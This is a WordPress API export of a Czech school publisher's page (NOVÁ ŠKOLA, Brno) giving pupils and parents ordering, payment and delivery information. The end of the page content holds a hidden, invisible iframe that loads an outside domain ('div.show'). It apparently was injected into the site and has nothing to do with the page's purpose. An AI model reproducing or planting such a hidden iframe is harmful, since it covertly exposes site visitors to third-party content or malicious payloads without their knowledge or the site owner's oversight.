{"id":165,"date":"2009-01-06T14:56:28","date_gmt":"2009-01-06T13:56:28","guid":{"rendered":"http:\/\/nns.cz\/blog\/?page_id=165"},"modified":"2023-02-22T12:58:49","modified_gmt":"2023-02-22T10:58:49","slug":"informace-pro-zaky-a-rodice","status":"publish","type":"page","link":"https:\/\/www.nns.cz\/blog\/informace-pro-zaky-a-rodice\/","title":{"rendered":"Informace pro \u017e\u00e1ky a&nbsp;rodi\u010de"},"content":{"rendered":"<p style=\"text-align: center;\"><em>Dobr\u00fd den,<\/em><\/p>\n<p style=\"text-align: center;\"><em>v sou\u010dasn\u00e9 dob\u011b pracujeme na nov\u00e9 podob\u011b webov\u00fdch str\u00e1nek. Pr\u016fb\u011b\u017en\u011b zde naleznete v\u00edce informac\u00ed ur\u010den\u00fdch pr\u00e1v\u011b pro V\u00e1s.<\/em><\/p>\n<p style=\"text-align: center;\"><em>Va\u0161e NOV\u00c1 \u0160KOLA, s.r.o.<\/em><br \/>\n_______________________________________________________________________<\/p>\n<p><strong>Tituly (zbo\u017e\u00ed) lze objednat formou:<\/strong><br \/>\n&#8211; p\u00edsemn\u011b na adresu provozovny: NOV\u00c1 \u0160KOLA, s.r.o., Bratislavsk\u00e1 23d, 602&nbsp;00\u00a0 Brno<br \/>\n&#8211; e-mailem: <a title=\"nns@nns.cz\" href=\"mailto:nns@nns.cz\"><span style=\"color: blue;\">nns@nns.cz<\/span><\/a><br \/>\n&#8211; <a href=\"..\/..\/obchod\/?item=nabidka\" target=\"_blank\" rel=\"noopener\">e-shopem<\/a>, nebo <a href=\"..\/..\/obchod\/?item=quick_order\" target=\"_blank\" rel=\"noopener\">rychlou objedn\u00e1vkou<\/a> v&nbsp;e-shopu<br \/>\n&#8211; objednat a&nbsp;zakoupit na na\u0161\u00ed provozovn\u011b: ul. Bratislavk\u00e1 23d, Brno, po-p\u00e1 od 8-16 hod.<\/p>\n<p>Vystaven\u00fd da\u0148ov\u00fd doklad na odebran\u00e9 zbo\u017e\u00ed bude hrazen dob\u00edrkou. Na provozovn\u011b je mo\u017en\u00e1 platba v&nbsp;hotovosti (p\u0159i&nbsp;platb\u011b hotov\u011b 5% sleva).<\/p>\n<p><strong>Dodac\u00ed lh\u016fta:<br \/>\n<\/strong>Pro doru\u010den\u00ed titul\u016f je 10&nbsp;dn\u00ed od doru\u010den\u00ed objedn\u00e1vky, v&nbsp;p\u0159\u00edpad\u011b, \u017ee zbo\u017e\u00ed nen\u00ed skladem kontaktujeme v\u00e1s.<\/p>\n<p><strong>Forma doru\u010den\u00ed:<\/strong><br \/>\n&#8211; \u010cesk\u00e1 po\u0161ta s.p. \u2013 obchodn\u00ed bal\u00edk v\u010detn\u011b dob\u00edrky 150,- K\u010d,\u00a0ne\u00fa\u010dtujeme baln\u00e9,<br \/>\n&#8211; vlastn\u00ed odb\u011br v&nbsp;provozovn\u011b.<\/p>\n<p>Abychom V\u00e1m mohli umo\u017enit u\u017e\u00edv\u00e1n\u00ed e-shopu, pot\u0159ebujeme zpracov\u00e1vat \u0159adu \u00fadaj\u016f, z\u00a0nich\u017e n\u011bkter\u00e9 spadaj\u00ed do kategorie osobn\u00edch \u00fadaj\u016f. Podrobn\u00e9 aktu\u00e1ln\u00ed informace o&nbsp;tom, jak\u00fdmi z\u00e1sadami zpracov\u00e1n\u00ed osobn\u00edch \u00fadaj\u016f se \u0159\u00edd\u00edme, naleznete na adrese: <a href=\"https:\/\/www.nns.cz\/blog\/zasady-zpracovani-osobnich-udaju\/\">https:\/\/www.nns.cz\/blog\/zasady-zpracovani-osobnich-udaju\/<\/a>.<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Dobr\u00fd den, v&nbsp;sou\u010dasn\u00e9 dob\u011b pracujeme na nov\u00e9 podob\u011b webov\u00fdch str\u00e1nek. Pr\u016fb\u011b\u017en\u011b zde naleznete v\u00edce informac\u00ed ur\u010den\u00fdch pr\u00e1v\u011b pro V\u00e1s. Va\u0161e NOV\u00c1 \u0160KOLA, s.r.o. _______________________________________________________________________ Tituly (zbo\u017e\u00ed) lze objednat formou: &#8211; p\u00edsemn\u011b na adresu provozovny: NOV\u00c1 \u0160KOLA, s.r.o., Bratislavsk\u00e1 23d, 602&nbsp;00\u00a0 Brno &#8211; e-mailem: nns@nns.cz &#8211; e-shopem, nebo rychlou objedn\u00e1vkou v&nbsp;e-shopu &#8211; objednat a&nbsp;zakoupit na [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-165","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/comments?post=165"}],"version-history":[{"count":22,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/165\/revisions"}],"predecessor-version":[{"id":16482,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/165\/revisions\/16482"}],"wp:attachment":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/media?parent=165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}